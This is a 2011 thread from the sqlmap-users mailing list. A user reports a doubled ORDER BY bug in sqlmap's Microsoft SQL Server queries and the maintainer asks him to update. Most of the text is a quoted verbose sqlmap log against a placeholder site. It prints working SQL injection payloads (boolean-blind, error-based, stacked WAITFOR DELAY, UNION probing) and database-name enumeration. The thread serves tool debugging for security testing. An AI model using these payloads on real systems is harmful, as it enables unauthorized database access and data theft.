ORDER BY > 1 > > ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) > > AND 'MPbC'='MPbC > > [09:56:02] [DEBUG] got HTTP error code: 500 (Internal Server Error) > > [09:56:02] [DEBUG] performed 38 queries in 16 seconds > > available databases [37]: > > > > [09:56:02] [WARNING] HTTP error codes detected during testing: > > 500 (Internal Server Error) - 62 times > > [09:56:02] [INFO] Fetched data logged to text files under > > '/path/sqlmap-dev/output/www.vuln.com' > > > > [*] shutting down at: 09:56:02 > > > > David > > > > > ------------------------------------------------------------------------------ > > The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE: > > Pinpoint memory and threading errors before they happen. > > Find and fix more than 250 security defects in the development cycle. > > Locate bottlenecks in serial and parallel code that limit performance. > > http://p.sf.net/sfu/intel-dev2devfeb > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > Alternate: miroslav.stampar (at) mail.ru > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- David Gomes Guimarães |
|
From: Miroslav S. <mir...@gm...> - 2011-02-09 12:40:36
|
hi David. please update to the latest commit (r3289 - committed this moment) and retry. kr On Wed, Feb 9, 2011 at 1:24 PM, David Guimaraes <sk...@gm...> wrote: > There is an error with Sql Server querys.. probably in queries.xml ?? The > problem are these two ORDER BY in query send to server (--db, --tables, > etc.). I checked it after upgrading to the latest svn revision. > > 20111' AND > 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh > [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the > keyword 'ORDER'. > > Log: > > #./sqlmap.py --cookie "ASPSESSIONIDCABDBSQC=..." -u > "http://www.vuln.com/path/default.asp?p=20111" -p p -v 3 --dbs --flush > --batch | tee saida.txt > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 09:55:04 > > [09:55:04] [DEBUG] cleaning up configuration parameters > [09:55:04] [DEBUG] setting the HTTP timeout > [09:55:04] [DEBUG] setting the HTTP Cookie header > [09:55:04] [DEBUG] setting the HTTP method to GET > [09:55:04] [DEBUG] creating HTTP requests opener object > [09:55:04] [WARNING] the testable parameter 'p' you provided is not into the > Cookie > [09:55:04] [INFO] using '/path/sqlmap-dev/output/www.vuln.com/session' as > session file > [09:55:04] [INFO] flushing session file > [09:55:04] [INFO] testing connection to the target url > [09:55:05] [INFO] testing if the url is stable, wait a few seconds > [09:55:06] [INFO] url is stable > [09:55:06] [PAYLOAD] 20111'(''')"('' > [09:55:07] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:07] [INFO] heuristic test shows that GET parameter 'p' might be > injectable (possible DBMS: Microsoft SQL Server) > [09:55:07] [INFO] testing sql injection on GET parameter 'p' > [09:55:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' > [09:55:07] [PAYLOAD] 20111) AND 4197=5111 AND (1965=1965 > [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952 > [09:55:08] [PAYLOAD] 20111) AND 4255=4255 AND (6152=6152 > [09:55:08] [PAYLOAD] 20111 AND 3013=569 > [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952 > [09:55:08] [PAYLOAD] 20111 AND 4255=4255 > [09:55:09] [PAYLOAD] 20111') AND 513=8635 AND ('kiwS'='kiwS > [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:09] [PAYLOAD] 20111') AND 4255=4255 AND ('ofle'='ofle > [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:09] [PAYLOAD] 20111' AND 8628=4076 AND 'Jbgn'='Jbgn > [09:55:10] [DEBUG] setting match ratio for current parameter to 0.952 > [09:55:10] [PAYLOAD] 20111' AND 4255=4255 AND 'obQa'='obQa > [09:55:10] [PAYLOAD] 20111' AND 9514=9437 AND 'ZUZG'='ZUZG > [09:55:11] [INFO] GET parameter 'p' is 'AND boolean-based blind - WHERE or > HAVING clause' injectable > [09:55:11] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING > clause (Generic comment)' because the payload for boolean-based blind has > already been identified > [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING > clause' because the payload for boolean-based blind has already been > identified > [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING > clause (Generic comment)' because the payload for boolean-based blind has > already been identified > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter > replace' because the payload for boolean-based blind has already been > identified > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter > replace (original value)' because the payload for boolean-based blind has > already been identified > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and > ORDER BY clauses' because the payload for boolean-based blind has already > been identified > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and > ORDER BY clauses (original value)' because the payload for boolean-based > blind has already been identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based > blind - Parameter replace (original value)' because the payload for > boolean-based blind has already been identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based > blind - ORDER BY clause' because the payload for boolean-based blind has > already been identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked > conditional-error blind queries' because the payload for boolean-based blind > has already been identified > [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - > WHERE or HAVING clause' > [09:55:11] [PAYLOAD] 20111' AND > 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl > [09:55:11] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:11] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase AND > error-based - WHERE or HAVING clause' injectable > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND > error-based - WHERE or HAVING clause (IN)' because the payload for > error-based has already been identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based > - WHERE or HAVING clause' because the payload for error-based has already > been identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based > - WHERE or HAVING clause (IN)' because the payload for error-based has > already been identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - > Parameter replace' because the payload for error-based has already been > identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - > ORDER BY clause' because the payload for error-based has already been > identified > [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' > [09:55:11] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos > [09:55:17] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos > [09:55:22] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase stacked > queries' injectable > [09:55:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' > [09:55:22] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua > [09:55:27] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua > [09:55:33] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase > time-based blind' injectable > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based > blind (heavy query)' because the payload for AND/OR time-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based > blind (heavy query - comment)' because the payload for AND/OR time-based > blind has already been identified > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based > blind (heavy query)' because the payload for AND/OR time-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING > clause (MySQL comment)' because the payload for boolean-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING > clause (MySQL comment)' because the payload for boolean-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - WHERE or > HAVING clause (RLIKE)' because the payload for boolean-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter > replace (MAKE_SET - original value)' because the payload for boolean-based > blind has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter > replace (ELT - original value)' because the payload for boolean-based blind > has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - > Parameter replace (original value)' because the payload for boolean-based > blind has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - > Parameter replace (original value)' because the payload for boolean-based > blind has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter > replace (original value)' because the payload for boolean-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP > BY and ORDER BY clauses' because the payload for boolean-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY > and ORDER BY clauses' because the payload for boolean-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - GROUP BY and > ORDER BY clauses' because the payload for boolean-based blind has already > been identified > [09:55:33] [DEBUG] skipping test 'MySQL stacked conditional-error blind > queries' because the payload for boolean-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked conditional-error blind > queries' because the payload for boolean-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE or > HAVING clause' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND error-based - WHERE or > HAVING clause' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING > clause (XMLType)' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING > clause (utl_inaddr.get_host_address)' because the payload for error-based > has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING > clause (ctxsys.drithsx.sn)' because the payload for error-based has already > been identified > [09:55:33] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING > clause' because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE or > HAVING clause' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING > clause' because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or > HAVING clause' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING > clause (XMLType)' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING > clause (utl_inaddr.get_host_address)' because the payload for error-based > has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING > clause (ctxsys.drithsx.sn)' because the payload for error-based has already > been identified > [09:55:33] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING > clause' because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter > replace' because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - Parameter > replace' because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle error-based - Parameter replace' > because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'Firebird error-based - Parameter replace' > because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and > ORDER BY clauses' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and > ORDER BY clauses' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle error-based - GROUP BY and ORDER BY > clauses' because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries' because > the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy > query)' because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because > the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' > because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)' > because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries > (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for stacked queries has > already been identified > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' > because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)' > because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)' > because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy > query)' because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' > because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind > (comment)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy > query - comment)' because the payload for AND/OR time-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind > (comment)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy > query - comment)' because the payload for AND/OR time-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind' because the > payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query - > comment)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy > query - comment)' because the payload for AND/OR time-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query > - comment)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 OR time-based blind' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind' because the > payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'Firebird OR time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 10 > columns' because the back-end DBMS identified is Microsoft SQL Server > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 11 to 20 > columns' because the level is higher than the provided > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 30 > columns' because the level is higher than the provided > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 31 to 40 > columns' because the level is higher than the provided > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 50 > columns' because the level is higher than the provided > [09:55:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > [09:55:33] [PAYLOAD] 20111' UNION ALL SELECT NULL-- AND 'vrjZ'='vrjZ > [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL-- AND 'GZNB'='GZNB > [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL-- AND > 'dLhE'='dLhE > [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND > 'XeTw'='XeTw > [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- > AND 'trjE'='trjE > [09:55:36] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:36] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, > NULL-- AND 'rjRE'='rjRE > [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, > NULL, NULL-- AND 'vmHq'='vmHq > [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, > NULL, NULL, NULL-- AND 'ZBcW'='ZBcW > [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, > NULL, NULL, NULL, NULL-- AND 'qhhM'='qhhM > [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, > NULL, NULL, NULL, NULL, NULL-- AND 'OaNn'='OaNn > [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:38] [INFO] target url appears to be UNION injectable with 3 columns > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(100)+CHAR(102)+CHAR(99)+CHAR(99) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND > 'VYhx'='VYhx > [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(102)+CHAR(86)+CHAR(76)+CHAR(122) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'TyzA'='TyzA > [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(116)+CHAR(101)+CHAR(83)+CHAR(98) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND > 'bKpM'='bKpM > [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:40] [PAYLOAD] -8546' UNION ALL SELECT NULL, NULL, > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(76)+CHAR(119)+CHAR(88)+CHAR(66) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'HwBz'='HwBz > [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:40] [PAYLOAD] -2422' UNION ALL SELECT > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(106)+CHAR(68)+CHAR(90)+CHAR(75) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND > 'hiSw'='hiSw > [09:55:41] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:41] [PAYLOAD] -9676' UNION ALL SELECT NULL, > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(111)+CHAR(120)+CHAR(102)+CHAR(77) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND > 'FIBp'='FIBp > [09:55:43] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 11 to 20 > columns' because the level is higher than the provided > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 30 > columns' because the level is higher than the provided > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40 > columns' because the level is higher than the provided > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50 > columns' because the level is higher than the provided > [09:55:43] [INFO] GET parameter 'p' is vulnerable. Do you want to keep > testing the others? [y/N] N > [09:55:43] [DEBUG] used the default behaviour, running in batch mode > sqlmap identified the following injection points with a total of 30 HTTP(s) > requests: > --- > Place: GET > Parameter: p > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: p=20111' AND 4255=4255 AND 'obQa'='obQa > > Type: error-based > Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING > clause > Payload: p=20111' AND > 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl > > Type: stacked queries > Title: Microsoft SQL Server/Sybase stacked queries > Payload: p=20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos > > Type: AND/OR time-based blind > Title: Microsoft SQL Server/Sybase time-based blind > Payload: p=20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua > --- > > [09:55:43] [INFO] testing Microsoft SQL Server > [09:55:43] [PAYLOAD] 20111' AND > 876=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > (CASE WHEN (BINARY_CHECKSUM(76)=BINARY_CHECKSUM(76)) THEN CHAR(49) ELSE > CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND > 'XHDB'='XHDB > [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:44] [INFO] retrieved: 1 > [09:55:44] [DEBUG] performed 1 queries in 0 seconds > [09:55:44] [INFO] confirming Microsoft SQL Server > [09:55:44] [PAYLOAD] 20111' AND > 2557=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > (CASE WHEN (HOST_NAME()=HOST_NAME()) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'eONH'='eONH > [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:44] [INFO] retrieved: 1 > [09:55:44] [DEBUG] performed 1 queries in 0 seconds > [09:55:44] [PAYLOAD] 20111' AND > 1181=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > (CASE WHEN (XACT_STATE()=XACT_STATE()) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'erPM'='erPM > [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:44] [INFO] retrieved: 1 > [09:55:44] [DEBUG] performed 1 queries in 0 seconds > [09:55:44] [PAYLOAD] 20111' AND > 2691=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > (CASE WHEN (SYSDATETIME()=SYSDATETIME()) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ZLNT'='ZLNT > [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:45] [INFO] retrieved: 1 > [09:55:45] [DEBUG] performed 1 queries in 0 seconds > [09:55:45] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows Vista > web application technology: ASP.NET, Microsoft IIS 7.0 > back-end DBMS: Microsoft SQL Server 2008 > [09:55:45] [INFO] fetching database names > [09:55:45] [PAYLOAD] 20111' AND > 7776=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND > 'IIWR'='IIWR > [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:45] [INFO] the SQL query used returns 37 entries > [09:55:45] [PAYLOAD] 20111' AND > 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh > [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:46] [PAYLOAD] 20111' AND > 5378=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'nEZn'='nEZn > [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:46] [PAYLOAD] 20111' AND > 3153=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'PAcn'='PAcn > [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:47] [PAYLOAD] 20111' AND > 2020=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 3 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'KnEl'='KnEl > [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:47] [PAYLOAD] 20111' AND > 8124=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 4 name FROM > master..sysdatabases ORDER BY 1 ORDER BY 